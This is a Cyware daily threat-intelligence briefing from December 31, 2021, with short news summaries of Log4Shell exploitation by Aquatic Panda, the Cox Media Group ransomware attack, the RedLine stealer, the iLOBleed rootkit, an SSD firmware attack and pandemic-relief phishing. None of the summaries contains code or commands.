Go to listing page

Cyware Daily Threat Intelligence, December 31, 2021

Cyware Daily Threat Intelligence, December 31, 2021

Share Blog Post

As we bid adieu to 2021, here’s the last daily threat briefing of the year. The Log4Shell flaw continues to remain a potential threat for organizations as researchers uncover new attack attempts from the Aquatic Panda APT group. The attackers leveraged the vulnerability to steal industrial intelligence and military secrets from an academic institution.

Incidents impacting sensitive data were also reported in the last 24 hours. While the RedLine info-stealer targeted Chrome, Opera, and Microsoft Edge browsers in an attempt to steal information from users, another group of attackers was observed using a new iLOBleed rootkit to wipe out data from systems connected to HP Enterprise’s Integrated Lights-Out (iLO) servers.

Top Breaches Reported in the Last 24 Hours

Update on Cox Media Group attack
It has been found that the ransomware attack on Cox Media Group was the work of Iranian hackers called DEV-0270. The attack had occurred in May and the firm became aware of it in June after some of their systems were encrypted.

Aquatic Panda makes attack attempt
Researchers exposed recent activities of Aquatic Panda threat actors that leveraged a modified exploit for the Log4Shell vulnerability. The attackers were observed making multiple attack attempts to harvest credentials by launching living-off-the-land attacks.

Top Malware Reported in the Last 24 Hours

AvosLocker releases free decryptor
The AvosLocker operators released a free decryptor after they accidentally encrypted the systems of a U.S. government agency. Attackers took this action following the recent takedown operations undertaken by law enforcement agencies.

RedLine targets browsers
RedLine malware is targeting Chrome, Opera, and Microsoft Edge browsers in an attempt to steal information from users. The information collected includes login credentials, cryptocurrency wallet information, credit card data, cookies, IP addresses, OS information, and other system information.

New iLOBleed rootkit
A newly found rootkit dubbed iLOBleed was found targeting HP Enterprise’s Integrated Lights-Out (iLO) servers in the wild to wipe out data from the systems. The adversary behind the attack and modus operandi remains unknown.

Top Vulnerabilities Reported in the Last 24 Hours

New Hardware-based attack method
Researchers have developed a set of attacks against some Solid-State Drives (SSDs) that can allow threat actors to plant malware in the device. The attack can be launched using the firmware manager to change the size of the Over-Provisioning (OP) area. As a result, this generates exploitable invalid data space.

Top Scams Reported in the Last 24 Hours

Phishing through pandemic relief plans
Scammers continue to leverage pandemic relief plans to create a sense of anxiety among users. In one such incident, the cybercriminals posed as representatives of the United States Small Business Administration (SBA) and offered users fake grant applications. These fake applications were designed using Google forms that required personal information of users.


cox media group
ilobleed rootkit
redline info stealer
avoslocker operators
aquatic panda apt group

Posted on: December 31, 2021

More from Cyware

Stay updated on the security threat landscape and technology innovations at Cyware with our threat intelligence briefings and blogs.

The Virtual Cyber Fusion Suite